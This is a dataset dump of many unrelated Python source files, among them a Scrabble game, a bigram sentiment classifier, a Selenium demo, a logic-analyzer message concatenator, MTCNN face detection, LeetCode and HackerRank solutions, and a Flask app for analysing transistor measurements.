3\r\n #print(value)\r\n score += value\r\n #print(score)\r\n #print(scores)\r\n scores[turn] += score\r\n #print(scores)\r\n text = \"Player \"+str(turn+1)+\"\\n\\nScore: \"+str(scores[turn])\r\n playerinfo[turn].text=str(text)\r\n \r\n \r\n \r\n \r\n\r\ndef NextTurn():\r\n global turn,TilesUsed,SquaresUsed,movecount\r\n #print(TilesUsed)\r\n #print(SquaresUsed)\r\n \r\n AddScore()\r\n \r\n TilesUsed.sort(reverse=True)\r\n for each in TilesUsed:\r\n hands[turn].pop(each)\r\n TilesUsed = []\r\n SquaresUsed = []\r\n \r\n if movecount != 0:\r\n turn+=1\r\n if turn == no_of_players:\r\n turn -= no_of_players\r\n movecount+=1\r\n SwitchHand()\r\n for square in squares:\r\n if square.bg==\"goldenrod1\":\r\n square.bg=\"light goldenrod\"\r\n \r\n\r\ndef SwitchHand():\r\n global keeptiles\r\n for i in playerinfo:\r\n i.enabled=False\r\n i.bg=\"white\"\r\n i.text_color=\"black\" \r\n playerinfo[turn].enabled=True\r\n playerinfo[turn].bg=\"black\"\r\n playerinfo[turn].text_color=\"white\" \r\n keeptiles = len(hands[turn])\r\n for i in range(7):\r\n if i > keeptiles-1:\r\n hand[i].bg=\"SystemButtonFace\"\r\n hand[i].text=\"\"\r\n hand[i].enabled=False\r\n else:\r\n hand[i].text=hands[turn][i]\r\n hand[i].bg=\"light goldenrod\"\r\n hand[i].enabled=True\r\n hand[i].text_color=\"black\"\r\n if keeptiles < 7:\r\n DrawButton.enabled=True\r\n NextButton.enabled=False\r\n\r\n \r\ndef SelectTile(i):\r\n global tileindex, HandFull\r\n if len(hands[turn])==7: \r\n for j in hand:\r\n if j.enabled==True:\r\n j.bg=\"light goldenrod\"\r\n j.text_color=\"black\"\r\n hand[i].bg=\"black\"\r\n hand[i].text_color=\"white\"\r\n tileindex = i\r\n\r\ndef ShowHand():\r\n global hand\r\n hand = list()\r\n for i in range(7):\r\n hand.append(PushButton(app,grid=[i,11],text=\"\",width=3,\r\n command=lambda i=i: SelectTile(i))) \r\n hand[-1].text_size=30\r\n hand[-1].tk.configure(borderwidth=5) \r\n if i > 3:\r\n hand[-1].grid = [i-4,12,2,1]\r\n\r\ndef AddBag():\r\n global alltiles,hands,points\r\n alphabet.append(\"\")\r\n points = [1, 3, 3, 2, 1, 4, 2, 4, 1, 8, 5, 1, 3, 1, 1, 3, 10, 1,\r\n 1, 1, 1, 4, 4, 8, 4, 10, 0]\r\n letterfreq = [9, 2, 2, 4, 12, 2, 3, 2, 9, 1, 1, 4, 2, 6, 8, 2, 1,\r\n 6, 4, 6, 4, 2, 2, 1, 2, 1, 2]\r\n alltiles = []\r\n for number in range(27):\r\n for freq in range(letterfreq[number]):\r\n alltiles.append(alphabet[number])\r\n random.shuffle(alltiles)\r\n hands = list()\r\n for x in range(no_of_players):\r\n hands.append([])\r\n\r\n\r\ndef TakeTile():\r\n Visible = 0\r\n for i in range(7):\r\n if hand[i].enabled==True:\r\n Visible += 1\r\n hand[Visible].bg=\"light goldenrod\"\r\n hand[Visible].enabled=True\r\n if Visible == 6:\r\n DrawButton.enabled=False\r\n NextButton.enabled=True\r\n hand[Visible].text=alltiles[-1]\r\n hands[turn].append(alltiles[-1])\r\n alltiles.pop()\r\n DrawButton.text=\"Click to take a tile from the bag!\\nTiles remaining: \"+str(len(alltiles))\r\n \r\n\r\ndef AddDialogue():\r\n global message1,combo,playbutton\r\n ctrlframe = Box(app,layout=\"grid\",grid=[0,0,4,17],width=583,height=705)\r\n message1 = Text(app, grid=[0,4,4,1],text=\"How many players?\",size=30,width = 25)\r\n combo = Combo(app,options=[2,3,4],width=10,grid=[0,8,4,1])\r\n combo.text_size=20\r\n combo.bg=\"white\"\r\n playbutton = PushButton(app,text=\"PLAY\",grid=[0,12,4,1],width=7,command=Play)\r\n playbutton.text_size=50\r\n playbutton.bg=\"green2\"\r\n\r\nAddDialogue()\r\n\r\napp.display()\r\n","sub_path":"zcrabble.py","file_name":"zcrabble.py","file_ext":"py","file_size_in_byte":11006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"610939350","text":"import numpy as np\r\nfrom create_dictionary import create_dictionary\r\nfrom preprocessSentences import tokenize_corpus \r\nfrom preprocessSentences import find_wordcounts\r\nimport sys\r\nimport math\r\nimport random\r\nimport matplotlib.pyplot as plt\r\nfrom plot_roc import plot_roc\r\n\r\nSMOOTHING = 1.0\r\nBOW = \"out_bag_of_words_5.csv\"\r\nDICTIONARY = \"fs_vocab.txt\"\r\nCLASSES = \"out_classes_5.txt\"\r\nTRAINING = \"./train.txt\"\r\nTESTS = \"./test.txt\"\r\nEXPERIMENT_STEP = 20\r\n\r\n\r\n\"\"\" takes in the size of the vocabulary and reads in the sentences to create\r\n the bigram distributions and the p that any given sentence is positive\"\"\"\r\ndef get_distributions(docs, classes, len_vocab, n):\r\n dist_pos = []\r\n word_counts_pos = []\r\n dist_neg = []\r\n word_counts_neg = len_vocab * SMOOTHING\r\n\r\n for i in range(len_vocab + 2):\r\n a = []\r\n b = []\r\n for j in range(len_vocab + 2):\r\n a.append(SMOOTHING)\r\n b.append(SMOOTHING)\r\n dist_neg.append(a)\r\n dist_pos.append(b)\r\n\r\n pos_count = 0\r\n r = list(range(len(docs)))\r\n random.shuffle(r)\r\n for i in range(n):\r\n doc = docs[r[i]]\r\n last_word = len_vocab + 1\r\n for word in doc:\r\n if int(classes[r[i]]) == 0:\r\n dist_neg[last_word][word] += 1\r\n else:\r\n dist_pos[last_word][word] += 1\r\n last_word = word\r\n if int(classes[r[i]]) != 0:\r\n pos_count += 1\r\n\r\n dist_neg_logs = [[math.log(e / float(sum(d))) for e in d] for d in dist_neg]\r\n dist_pos_logs = [[math.log(e / float(sum(d))) for e in d] for d in dist_pos]\r\n # print pos_count, n\r\n p_pos = float(pos_count) / float(n)\r\n return (dist_neg_logs, dist_pos_logs, p_pos)\r\n\r\ndef get_data(path, vocab, word_to_id):\r\n docs, classes, _, _ = tokenize_corpus(path, train=True)\r\n docsid = []\r\n for doc in docs:\r\n ids = []\r\n for word in doc:\r\n if word in word_to_id.keys():\r\n ids.append(word_to_id[word])\r\n else:\r\n ids.append(len(vocab))\r\n docsid.append(ids)\r\n return (docsid, classes)\r\n\r\ndef find_p(observed, dist):\r\n p = 0.0\r\n last_word = len(dist) - 1\r\n for word in observed:\r\n p += dist[last_word][word]\r\n last_word = word\r\n return p\r\n\r\ndef predict(test_case, dist_pos, dist_neg, p_pos):\r\n p_given_neg = find_p(test_case, dist_neg)\r\n p_given_pos = find_p(test_case, dist_pos)\r\n # print p_given_neg, p_given_pos\r\n return -math.log(1.0-p_pos) - p_given_neg - math.log(p_pos) + p_given_pos\r\n\r\ndef main():\r\n # create word dictionaries\r\n word_to_id, vocab = create_dictionary(DICTIONARY)\r\n\r\n # training data\r\n train_docs, train_classes = get_data(TRAINING, vocab, word_to_id)\r\n\r\n # find test data\r\n test_docs, test_classes = get_data(TESTS, vocab, word_to_id)\r\n\r\n # train\r\n dist_neg, dist_pos, p_pos = get_distributions(train_docs, train_classes, len(vocab), 2400)\r\n\r\n #print dist_pos[55]\r\n # test\r\n scores = []\r\n for i in range(len(test_classes)):\r\n test_case = test_docs[i]\r\n scores.append(predict(test_case, dist_pos, dist_neg, p_pos))\r\n\r\n # print \"%d out of %d tests correct predicted %d neg\" % (correct, len(test_classes), zeroes)\r\n\r\n plot_roc(scores, [int(cl) for cl in test_classes], \"bigram\")\r\n np.savetxt(\"n_gram_scores.txt\", scores)\r\nmain()","sub_path":"sentiment/scripts/predict_n_gram.py","file_name":"predict_n_gram.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"136889957","text":"#!/usr/bin/env python3\nfrom argparse import ArgumentParser\nfrom pathlib import Path\nimport pandas as pd\n\n\naparser = ArgumentParser(\n description='Combine probabilistic forecast'\n)\n\naparser.add_argument('--mean', type=Path, required=True)\naparser.add_argument('--std', type=Path, required=True)\naparser.add_argument('--out', type=Path, required=True)\nargs = aparser.parse_args()\n\nmean = pd.read_csv(args.mean, index_col='time', parse_dates=['time'])\nstd = pd.read_csv(args.std, index_col='time', parse_dates=['time'])\n\ncombined = pd.concat((mean, std), axis=1)\ncombined.to_csv(args.out)\n","sub_path":"BP2Q1/combine_prob_forecast.py","file_name":"combine_prob_forecast.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"651677538","text":"import time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\n# driver = webdriver.Firefox()\n\ndriver = webdriver.Chrome(executable_path=r\"C:\\Users\\pathapaa\\Videos\\git_practice\\selenium_practice\\chromedriver_win\\chromedriver.exe\")\n\ndriver.get(\"http://demo.automationtesting.in/Windows.html\") # to navigate to given URL\n\nprint(driver.title) # displays the title of the page\n\nprint(driver.current_url) # returns url of the current page\n\n# to perform action/click or some thing , once u find the button we need to click on the same\n# so we are using click method\ndriver.find_element_by_xpath('//*[@id=\"Tabbed\"]/a/button').click()\ntime.sleep(5)\n\n# close the browser and it will open only one window at a time . Let say we are clicking on one button\n# where it is opening new tab , if u use close it will close the parent tab only not the child tab which\n# opened by your click\n# driver.close() # currently focused tab\n\ndriver.quit() # to close the all the tabs\n","sub_path":"selenium_practice/webdriver_commands.py","file_name":"webdriver_commands.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"148008183","text":"# This HLA combines a stream of bytes into multi-byte messages.\n# To detect the end of a message and the start of the next one, you can choose between timeouts or\n# delimiter bytes (or both).\n# Output can be displayed as HEX or ASCII.\n# Supported input protocols are I2C, SPI and Serial UART.\n\n# This HLA was forked from Mark Garrison's example HLA \"Text Messages\"\n\n# Settings constants.\nfrom saleae.analyzers import HighLevelAnalyzer, AnalyzerFrame, StringSetting, NumberSetting, ChoicesSetting\nfrom saleae.data import GraphTimeDelta\n\nMESSAGE_PREFIX_SETTING = 'Message Prefix (optional)'\nPACKET_TIMEOUT_SETTING = 'Packet Timeout [µs]'\nPACKET_DELIMITER_SETTING = 'Packet Delimiter'\nDISPLAY_FORMAT_SETTING = 'Display Format'\n\nDELIMITER_CHOICES = {\n 'None': '',\n 'New Line [\\\\n]': '\\n',\n 'Null [\\\\0]': '\\0',\n 'Space [\\' \\']': ' ',\n 'Semicolon [;]': ';',\n 'Tab [\\\\t]': '\\t'\n}\n\nDISPLAY_FORMAT_CHOICES = {\n 'ASCII': 'ascii',\n 'HEX': 'hex'\n}\n\nclass Concatenator(HighLevelAnalyzer):\n\n temp_frame = None\n delimiter = '\\n'\n\n # Settings:\n prefix = StringSetting(label='Message Prefix (optional)')\n packet_timeout = NumberSetting(label='Packet Timeout [µs]', min_value=1, max_value=1E10) # , default_value=30)\n delimiter_setting = ChoicesSetting(label='Packet Delimiter', choices=DELIMITER_CHOICES.keys())\n display_format_setting = ChoicesSetting(label='Display Format', choices=DISPLAY_FORMAT_CHOICES.keys())\n\n # Base output formatting options:\n result_types = {\n 'error': {\n 'format': 'Error!'\n },\n }\n\n def __init__(self):\n self.delimiter = DELIMITER_CHOICES.get(self.delimiter_setting, '\\n')\n self.display_format = DISPLAY_FORMAT_CHOICES.get(self.display_format_setting, 'hex')\n self.result_types[\"message\"] = {\n 'format': self.prefix + ('{{{data.hex}}}' if self.display_format == 'hex' else '{{{data.str}}}')\n }\n\n def clear_stored_message(self, frame):\n self.temp_frame = AnalyzerFrame('message', frame.start_time, frame.end_time, {\n 'str': '',\n 'hex': ''\n })\n\n def append_str(self, str):\n self.temp_frame.data[\"str\"] += str\n\n def append_hex(self, str):\n self.temp_frame.data[\"hex\"] += str\n\n def have_existing_message(self):\n if self.temp_frame is None:\n return False\n if len(self.temp_frame.data[\"str\"]) == 0:\n return False\n return True\n\n def update_end_time(self, frame):\n self.temp_frame.end_time = frame.end_time\n\n def decode(self, frame: AnalyzerFrame):\n # This class method is called once for each frame produced by the input analyzer.\n # the \"data\" dictionary contents is specific to the input analyzer type. The readme with this repo contains a description of the \"data\" contents for each input analyzer type.\n # all frames contain some common keys: start_time, end_time, and type.\n\n # This function can either return nothing, a single new frame, or an array of new frames.\n # all new frames produced are dictionaries and need to have the required keys: start_time, end_time, and type\n # in addition, protocol-specific information should be stored in the \"data\" key, so that they can be accessed by rendering (using the format strings), by export, by the terminal view, and by the protocol search results list.\n # Not all of these are implemented yet, but we're working on it!\n\n # All protocols - use the delimiter specified in the settings.\n delimiters = [] if self.delimiter == '' else [self.delimiter]\n\n # All protocols - delimit on a delay specified in the settings\n # consider frames further apart than this separate messages\n maximum_delay = GraphTimeDelta(second=self.packet_timeout * 0.000001 or 0.5E-3)\n # I2C - delimit on address byte\n # SPI - delimit on Enable toggle. TODO: add support for the SPI analyzer to send Enable/disable frames, or at least a Packet ID to the low level analyzer.\n\n char = \"unknown error\"\n hexVal = \"unknown error\"\n\n # setup initial result, if not present\n first_frame = False\n if self.temp_frame is None:\n first_frame = True\n self.clear_stored_message(frame)\n\n # handle serial data and I2C data\n if frame.type == \"data\" and \"data\" in frame.data.keys():\n value = frame.data[\"data\"][0]\n char = chr(value)\n hexVal = format(value, '02X')\n\n # handle I2C address\n if frame.type == \"address\":\n value = frame.data[\"address\"][0]\n # if we have an existing message, send it\n if self.have_existing_message() == True:\n ret = self.temp_frame\n self.clear_stored_message(frame)\n self.append_str(\"address: \" + hex(value) + \";\")\n self.append_hex(\"address: \" + hex(value) + \";\")\n return ret\n # append the address to the beginning of the new message\n self.append_str(\"address: \" + hex(value) + \";\")\n self.append_hex(\"address: \" + hex(value) + \";\")\n return None\n\n # handle I2C start condition\n if frame.type == \"start\":\n return\n\n # handle I2C stop condition\n if frame.type == \"stop\":\n if self.have_existing_message() == True:\n ret = self.temp_frame\n self.temp_frame = None\n return ret\n self.temp_frame = None\n return\n\n # handle SPI byte\n if frame.type == \"result\":\n char = \"\"\n if \"miso\" in frame.data.keys() and frame.data[\"miso\"] != 0:\n char += chr(frame.data[\"miso\"])\n hexVal += format(frame.data[\"miso\"], '02X')\n if \"mosi\" in frame.data.keys() and frame.data[\"mosi\"] != 0:\n char += chr(frame.data[\"mosi\"])\n hexVal += format(frame.data[\"mosi\"], '02X')\n\n # If we have a timeout event, commit the frame and make sure not to add the new frame after the delay, and add the current character to the next frame.\n if first_frame == False and self.temp_frame is not None:\n if self.temp_frame.end_time + maximum_delay < frame.start_time:\n ret = self.temp_frame\n self.clear_stored_message(frame)\n self.append_str(char)\n self.append_hex(hexVal + \" \")\n return ret\n\n self.append_str(char)\n self.append_hex(hexVal + \" \")\n self.update_end_time(frame)\n\n # if the current character is a delimiter, commit it.\n if (delimiters != []) and (char in delimiters):\n ret = self.temp_frame\n # leave the temp_frame blank, so the next frame is the beginning of the next message.\n self.temp_frame = None\n return ret\n","sub_path":"concatenator.py","file_name":"concatenator.py","file_ext":"py","file_size_in_byte":6919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"481194101","text":"from selenium.webdriver.common.by import By\nfrom time import sleep\n\nlink =' http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/'\n\n\ndef test_add_busket_button(browser):\n browser.get(link)\n #sleep(30)\n add_basket=browser.find_element_by_css_selector(\".btn-add-to-basket\")\n assert add_basket, 'No add button on page'","sub_path":"unit3. Тестовые фреймворки/6. PyTest — параметризация, конфигурирование, плагины/Рецензии/2/Language_store-master/test_items.py","file_name":"test_items.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"357593963","text":"import unittest\nimport json\n\nfrom AccessToken import AccessToken\n\nclass TokenTest(unittest.TestCase):\n def setUp(self):\n strstr = \"\"\"\n{\"access_token\": \"WEwwW_suwzkw0g4DihE7xgbpX7m3M3BFRTbllvLaiXuiUBMRa_C_caBnpYob8ddVb1RIFkt-vGO7leWeEcwkJmlP5cJkanWydG-qTHn4DqsYaQs1RSYgo0hhBndm17jDIWRhADAVJE\", \"update_time\": 1455966724.439898, \"expires_in\": 7200}\n\"\"\"\n self.zdict = json.loads(strstr)\n\n def test_token_expire(self):\n self.test_save()\n tk = AccessToken()\n tk2 = tk.load(\"test_save\")\n self.assertEqual(7200, tk2.expires_in)\n\n\n def test_token_init(self):\n tk = AccessToken()\n self.assertTrue(isinstance(tk, AccessToken))\n\n def test_setData(self):\n tk = AccessToken()\n tk.set_data(self.zdict)\n self.assertTrue(tk.access_token)\n pass\n\n def test_save(self):\n tk = AccessToken()\n tk.set_data(self.zdict)\n tk.save(\"test_save\")\n\n def test_load(self):\n self.test_save()\n tk = AccessToken()\n tk2 = tk.load(\"test_save\")\n self.assertEqual(tk.access_token, tk2.access_token)\n self.assertEqual(tk.expires_in, tk2.expires_in)\n self.assertEqual(tk.update_time, tk2.update_time)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"AccessTokenTest.py","file_name":"AccessTokenTest.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"321394131","text":"#! /usr/bin/python3\n# -*- coding: utf-8 -*-S\n\n\ndef to_camel_case(line: str) -> str:\n result = str()\n next_upper = False\n for el in line:\n\n if next_upper:\n el = el.upper()\n next_upper = False\n if el == '_':\n el = ''\n next_upper = True\n result += el\n return result\n\n\ndef to_snake_case(line: str) -> str:\n result = str()\n for el in line:\n if el.isupper():\n el = '_' + el.lower()\n result += el\n return result\n\n\nprint(to_camel_case('print([res_square ** 2 for res_square in input_array if res_square > 18 ])'))\n","sub_path":"lab_7/main_7.py","file_name":"main_7.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"179954822","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom scipy import misc\nimport sys\nimport os\nimport argparse\nimport tensorflow as tf\nimport numpy as np\nimport facenet\nimport align.detect_face\nimport random\nimport cv2\nfrom time import sleep\n\ndef initial_mtcnn():\n global pnet\n global rnet\n global onet\n\n with tf.Graph().as_default():\n gpu_options = tf.compat.v1.GPUOptions(per_process_gpu_memory_fraction=1.0)\n sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options, log_device_placement=False))\n with sess.as_default():\n pnet, rnet, onet = align.detect_face.create_mtcnn(sess, None)\n \n \n \"\"\"\n if nrof_faces>0:\n det = bounding_boxes[:,0:4]\n det_arr = []\n img_size = np.asarray(img.shape)[0:2]\n if nrof_faces>1:\n for i in range(nrof_faces):\n det_arr.append(np.squeeze(det[i])) \n else:\n det_arr.append(np.squeeze(det))\n\n for i, det in enumerate(det_arr):\n det = np.squeeze(det)\n bb = np.zeros(4, dtype=np.int32)\n bb[0] = np.maximum(det[0]-args.margin/2, 0)\n bb[1] = np.maximum(det[1]-args.margin/2, 0)\n bb[2] = np.minimum(det[2]+args.margin/2, img_size[1])\n bb[3] = np.minimum(det[3]+args.margin/2, img_size[0])\n cropped = img[bb[1]:bb[3],bb[0]:bb[2],:]\n scaled = misc.imresize(cropped, (182, 182), interp='bilinear')\n \"\"\"\ndef detect_faces_from_Image(img):\n\n minsize = 20 # minimum size of face\n threshold = [ 0.6, 0.7, 0.7 ] # three steps's threshold\n factor = 0.709 # scale factor\n\n img = img[:,:,0:3] \n bounding_boxes, _ = align.detect_face.detect_face(img, minsize, pnet, rnet, onet, threshold, factor)\n det = bounding_boxes\n \n return det\n \n\n\nif __name__ == '__main__':\n initial_mtcnn()\n\n # img = misc.imread(\"./Latest_Photo17.jpg\")\n\n # cap = cv2.VideoCapture(\"rtsp://wowzaec2demo.streamlock.net/vod/mp4:BigBuckBunny_115k.mov\")\n\n cap = cv2.VideoCapture(\"Face.mp4\")\n while(True):\n # Capture frame-by-frame\n ret, frame = cap.read()\n det = detect_faces_from_Image(frame)\n norf_faces=det.shape[0]\n det =np.squeeze(det[:,0:4])\n # Display the resulting frame\n if norf_faces==1:\n try:\n cv2.rectangle(frame,(int(np.round(det[0])),int(np.round(det[1]))),(int(np.round(det[2])),int(np.round(det[3]))),(0,255,0),2)\n except:\n print()\n elif norf_faces>1:\n for i in range(norf_faces):\n cv2.rectangle(frame,(int(np.round(det[i][0])),int(np.round(det[i][1]))),(int(np.round(det[i][2])),int(np.round(det[i][3]))),(0,255,0),2)\n\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n cv2.imshow('frame',frame)\n cap.release()\n cv2.destroyAllWindows()\n","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"640502825","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n\n# Complete the jumpingOnClouds function below.\ndef jumpingOnClouds(c):\n path = [0]\n last_visited = 0\n\n for i in range(len(c)):\n if c[i]==1:\n if not i==0 and i != len(c)-1:\n path.append(i-1)\n last_visited = i-1\n continue\n else:\n if i - last_visited <=1 :\n continue\n else:\n last_visited = i\n path.append(i)\n\n\n print(path) \n return len(path)-1\n\nif __name__ == '__main__':\n #fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input().rstrip())\n c = list(map(int, input().rstrip().split()))\n result = jumpingOnClouds(c)\n print(result)\n\n # fptr.write(str(result) + '\\n')\n\n # fptr.close()\n","sub_path":"pythonCodes/miscell_solutions/hackerrank/jumpOnClouds.py","file_name":"jumpOnClouds.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"229718347","text":"#!/usr/bin/python3\n'''\nPython script that use API,\nto export data in the CSV format.\n'''\nimport csv\nimport requests\nimport sys\n\n\nif __name__ == \"__main__\":\n emp_id = sys.argv[1]\n emp_name = requests.get(\"http://jsonplaceholder.typicode.com/users/{}\"\n .format(emp_id)).json().get(\"username\")\n done = []\n x = requests.get(\"http://jsonplaceholder.typicode.com/todos\").json()\n for todos in x:\n if (todos.get(\"userId\") == int(emp_id)):\n tmp = []\n tmp.extend((emp_id,\n emp_name,\n todos.get(\"completed\"),\n todos.get(\"title\")))\n done.append(tmp)\n\n with open(\"{}.csv\".format(emp_id), 'w+') as csvfile:\n writer = csv.writer(csvfile, delimiter=',',\n quotechar='\"', quoting=csv.QUOTE_ALL)\n writer.writerows(done)\n","sub_path":"0x15-api/1-export_to_CSV.py","file_name":"1-export_to_CSV.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"368497863","text":"\"\"\"Tests for super().\"\"\"\n\nfrom pytype.tests import test_base\n\n\nclass SuperTest(test_base.TargetPython27FeatureTest):\n \"\"\"Tests for super().\"\"\"\n\n def testSuperMissingArg(self):\n # Python 2 super call does not implicitly infer the class and self\n # arguments. At least the class argument should be specified.\n _, errors = self.InferWithErrors(\"\"\"\\\n class Foo(object):\n def __new__(cls):\n return super(cls).__new__(cls)\n class Bar(object):\n def __new__(cls):\n return super().__new__(cls)\n \"\"\")\n self.assertErrorLogIs(errors, [\n (3, \"wrong-arg-types\", r\"Type\\[super\\].*Type\\[Foo\\]\"),\n (6, \"wrong-arg-count\", r\"2.*0\")])\n\n\ntest_base.main(globals(), __name__ == \"__main__\")\n","sub_path":"pytype/tests/py2/test_super.py","file_name":"test_super.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"442219907","text":"# 1632. Rank Transform of a Matrix\n# vwc 212\n\n\n# 2021/06/03\n# Runtime: 4572 ms, faster than 14.29% of Python3 online submissions for Rank Transform of a Matrix.\n# Memory Usage: 88.5 MB, less than 17.35% of Python3 online submissions for Rank Transform of a Matrix.\n\n# 并查集 + 拓扑排序。O(n * m * (lgn + lgm)\n# 这题写的很粗糙。有很多值得优化的地方,讨论区也有很好的方法。下次试试吧。\n# 优化1:并查集的结点可以是(i, j),并不需要将值也放进去,本身没啥意义。\n# 用并查集将同行/列相同的元素连通起来。\n# 再将矩阵的每行每列都排序,得到一个关于所有结点的有向图。\n# 最后用bfs对这个有向图进行拓扑排序即可。\n\n\nclass Solution:\n def matrixRankTransform(self, matrix: List[List[int]]) -> List[List[int]]:\n DG = {}\n n, m = len(matrix), len(matrix[0])\n nodes = [(matrix[i][j], i, j) for i in range(n) for j in range(m)]\n uf = UnionFind(nodes)\n\n for i in range(n):\n row = sorted([(matrix[i][j], i, j) for j in range(m)])\n for l in range(m - 1):\n if row[l][0] == row[l + 1][0]:\n uf.union(row[l], row[l + 1])\n\n for j in range(m):\n col = sorted([(matrix[i][j], i, j) for i in range(n)])\n for l in range(n - 1):\n if col[l][0] == col[l + 1][0]:\n uf.union(col[l], col[l + 1])\n\n for i in range(n):\n row = sorted([(matrix[i][j], i, j) for j in range(m)])\n for l in range(m - 1):\n if row[l][0] == row[l + 1][0]:\n continue\n par, kid = uf.find(row[l]), uf.find(row[l + 1])\n if par not in DG:\n DG[par] = set([kid])\n else:\n DG[par].add(kid)\n for j in range(m):\n col = sorted([(matrix[i][j], i, j) for i in range(n)])\n for l in range(n - 1):\n if col[l][0] == col[l + 1][0]:\n continue\n par, kid = uf.find(col[l]), uf.find(col[l + 1])\n if par not in DG:\n DG[par] = set([kid])\n else:\n DG[par].add(kid)\n\n in_degrees = self.in_degrees(DG)\n start = [x for x in DG if not in_degrees[x]]\n ranks = {}\n q = collections.deque(start)\n level = 1\n while q:\n size = len(q)\n for _ in range(size):\n node = q.popleft()\n if node not in ranks:\n ranks[node] = level\n if node not in DG: continue\n for nei in DG[node]:\n in_degrees[nei] -= 1\n if not in_degrees[nei]:\n q.append(nei)\n level += 1\n ans = [[1] * m for _ in range(n)]\n for i in range(n):\n for j in range(m):\n node = uf.find((matrix[i][j], i, j))\n if node in ranks:\n ans[i][j] = ranks[node]\n return ans\n\n def in_degrees(self, graph):\n deg = {}\n for x in graph:\n if x not in deg:\n deg[x] = 0\n for y in graph[x]:\n deg[y] = deg.get(y, 0) + 1\n return deg\n\n\nclass UnionFind:\n def __init__(self, nodes):\n self.parents = {node: node for node in nodes}\n\n def find(self, node):\n root = node\n while root != self.parents[root]:\n root = self.parents[root]\n while root != node:\n old_root = self.parents[node]\n self.parents[node] = root\n node = old_root\n return root\n\n def union(self, x, y):\n root_x = self.find(x)\n root_y = self.find(y)\n if root_x == root_y:\n return False\n self.parents[root_x] = root_y\n","sub_path":"1632. Rank Transform of a Matrix.py","file_name":"1632. Rank Transform of a Matrix.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"489694771","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jul 1 21:08:18 2017\n\n@author: ujair\n\"\"\"\n\n\nfrom flask import Flask, render_template, request, redirect, url_for\nimport pandas as pd\nfrom operator import methodcaller\nimport numpy as np\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport mpld3\nfrom mpld3 import plugins\n\n\nsns.set_style('ticks')\n\napp = Flask(__name__)\n\n\ndef group_ngraph(dataframe):\n dataframe_col = dataframe.shape[1]\n RANGE = range(1, int(dataframe_col/4)+1)\n dv = ['Voltage_1 ({})'.format(i) for i in RANGE]\n dc = ['Current_1 ({})'.format(i) for i in RANGE]\n gv = ['Voltage_2 ({})'.format(i) for i in RANGE]\n gc = ['Current_2 ({})'.format(i) for i in RANGE]\n drain_v = text2float(dataframe[dv])\n drain_c = text2float(dataframe[dc])\n gate_v = text2float(dataframe[gv])\n gate_c = text2float(dataframe[gc])\n\n return drain_v, drain_c, gate_v, gate_c\n\n\ndef group_linear_saturation(dataframe):\n dv, dc, gv, gc = group_ngraph(dataframe)\n return pd.concat([dv, dc, gv, gc], axis=1)\n\n\ndef toNestedList(data):\n data = data.splitlines()\n splitedData = list(map(methodcaller(\"split\", \"\\t\"), data))\n\n return splitedData\n\n\ndef text2float(df):\n shape = df.shape\n c = df.columns\n v = df.values.astype('float64')\n df2 = pd.DataFrame(v.reshape(shape),\n columns=c)\n return df2\n\n\ndef linear_mu(L, a, W, Ci, v):\n return L*a/(W*Ci*v)\n\n\ndef linear_threshold(L, b, W, m, Ci, v):\n return -L*b/(W*m*Ci*v)\n\n\ndef saturation_mu(a, L, W, Ci):\n return 2*a*L/(W*Ci)\n\n\ndef saturation_threshold(b, L, W, m, Ci):\n return -b*L/(W*m*Ci)\n\n####################\n# Render HOME page\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n return render_template('index.html',\n title='PolyPhys Data Analysis')\n\n\n# end HOME page\n####################\n\n\n####################\n# for-ngraph page\n\n\n@app.route('/for-ngraph', methods=['GET', 'POST'])\ndef for_ngraph():\n return render_template('for-ngraph/for-ngraph.html',\n title='For Ngraph')\n\n\n@app.route('/for-ngraph/transformed', methods=['GET', 'POST'])\ndef for_ngraph_transform():\n title = \"Data is transformed!\"\n try:\n data = request.form['textarea'] # データを取得\n NestedList = toNestedList(data)\n try:\n df = pd.DataFrame(NestedList[1:], columns=NestedList[0])\n except:\n NestedList.pop(0)\n df = pd.DataFrame(NestedList[1:], columns=NestedList[0])\n drainVoltage, drainCurrent, gateVoltage, gateCurrent = 